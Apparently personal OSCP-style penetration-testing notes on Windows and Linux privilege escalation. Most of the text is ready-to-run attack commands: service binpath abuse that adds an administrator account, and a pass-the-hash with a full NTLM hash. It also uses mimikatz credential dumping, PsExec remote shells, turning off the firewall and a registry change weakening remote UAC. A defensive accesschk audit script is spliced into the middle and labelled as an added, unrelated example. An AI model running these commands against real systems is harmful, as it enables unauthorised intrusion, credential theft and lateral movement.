keepnote

File transfer:

Winpriv check:

https://github.com/codingo/OSCP-2/blob/master/Windows/WinPrivCheck.bat

Local Privilege Escalation Abusing Misconfiguration Service (upnphost):

accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk-xp.exe -uwcqv "Authenticated Users" * /accepteula

accesschk.exe -ucqv upnphost
sc config upnphost depend= ""
sc config upnphost binpath= "net user testxlab Password1 /add"
sc config upnphost binpath= "net localgroup Administrators testxlab /add"

sc stop upnphost
sc start upnphost
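The accesschk check above tells you whether a low-privileged principal can rewrite a service's configuration, which is the precondition for the binpath abuse that follows. The script below is an added audit helper (not part of these notes or of Sysinternals) that parses the verbose accesschk output and reports services where "Authenticated Users" hold a configuration-changing right. The output layout it assumes (a `R`/`RW` header line per service followed by tab-indented access rights) and the sample text are constructed, not captured from a real host; the set of rights treated as dangerous is the audit's own choice.

```python
"""Audit helper (added example, not from the original notes): parse the
verbose output of `accesschk.exe -uwcqv "Authenticated Users" *` and flag
services whose configuration a low-privileged principal may change.

Assumed output layout: one header line per service (`R  name` or
`RW name`), followed by one tab-indented line per access right.
The sample at the bottom is constructed, not real host data."""

import re
from typing import Dict, List, Optional

# Rights that let a caller rewrite the service's binary path, or take
# ownership of the service object and then grant themselves that right.
# This set is the audit's own choice, not something accesschk defines.
DANGEROUS_RIGHTS = {
    "SERVICE_ALL_ACCESS",
    "SERVICE_CHANGE_CONFIG",
    "WRITE_DAC",
    "WRITE_OWNER",
    "GENERIC_ALL",
    "GENERIC_WRITE",
}

# Header line: access summary (R, W or RW), whitespace, service name.
HEADER_RE = re.compile(r"^(R|W|RW)\s+(\S+)\s*$")


def parse_accesschk(output: str) -> Dict[str, List[str]]:
    """Return {service_name: [rights...]} from accesschk -v style output."""
    services: Dict[str, List[str]] = {}
    current: Optional[str] = None
    for raw in output.splitlines():
        line = raw.rstrip()
        if not line:
            continue
        m = HEADER_RE.match(line)
        if m:
            current = m.group(2)
            services[current] = []
        elif current is not None and line[0] in " \t":
            # Indented line: one access right belonging to the current service.
            services[current].append(line.strip())
    return services


def weak_services(output: str) -> Dict[str, List[str]]:
    """Services where the audited principal holds a config-changing right."""
    return {
        name: sorted(r for r in rights if r in DANGEROUS_RIGHTS)
        for name, rights in parse_accesschk(output).items()
        if any(r in DANGEROUS_RIGHTS for r in rights)
    }


# Constructed sample modelled on accesschk's layout (not real host data).
SAMPLE_OUTPUT = """\
RW SSDPSRV
\tSERVICE_ALL_ACCESS
RW upnphost
\tSERVICE_ALL_ACCESS
R  Spooler
\tSERVICE_QUERY_STATUS
\tSERVICE_QUERY_CONFIG
RW ExampleSvc
\tSERVICE_QUERY_CONFIG
\tSERVICE_CHANGE_CONFIG
"""

if __name__ == "__main__":
    for name, rights in sorted(weak_services(SAMPLE_OUTPUT).items()):
        print(f"{name}: {', '.join(rights)}")
```

Run it against saved accesschk output (for example `python audit.py < accesschk.txt` after swapping `SAMPLE_OUTPUT` for `sys.stdin.read()`); any service it lists should have its DACL tightened so that only administrators hold SERVICE_CHANGE_CONFIG.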

File Transfer via FTP

ftp> binary

ftp> put /root/Downloads/accesschk.exe accesschk.exe

cadaver http://10.11.1.14/

Python Interactive Shell

pty spawn:

python3 -c 'import pty;pty.spawn("/bin/bash")'

python -c 'import pty;pty.spawn("/bin/bash")'

Disable Windows firewall on newer versions: NetSh Advfirewall set allprofiles state off

Disable windows firewall on older windows: netsh firewall set opmode disable

References

priv esc linux - hackingarticles (abuse PATH variable): https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/ https://www.siberportal.org/red-team/linux-penetration-tests/linux-sizma-testlerinde-hak-yukseltme-yontemleri/

priv esc - cronjob https://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/

priv esc - windows - services - sc: https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/

PtH

pth-winexe -U alice%aad3b435b51404eeaad3b435b51404ee:B74242F37E47371AFF835A6EBCAC4FFE //10.11.1.49 cmd.exe

via sysinternals tools and mimikatz

  • PtH: get the user's NTLM hash (via RDP, MSF or other).

mimikatz# privilege::debug
mimikatz# sekurlsa::minidump FILE.DMP
mimikatz# sekurlsa::logonpasswords
mimikatz# sekurlsa::pth /user:{USERNAME} /domain:{WORKGROUP or DOMAIN} /ntlm:{NTLM-HASH}

Then open a new cmd; you can run commands via PsExec.

windows> PsExec.exe \\{IP} cmd

Tip: General usage with password:

PsExec.exe \\{IP} -u {DOMAIN\USERNAME} -p {PASSWORD} cmd

If you get the error "Couldn't access otherComputer: Access is denied.":

run the following command on the target system:

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
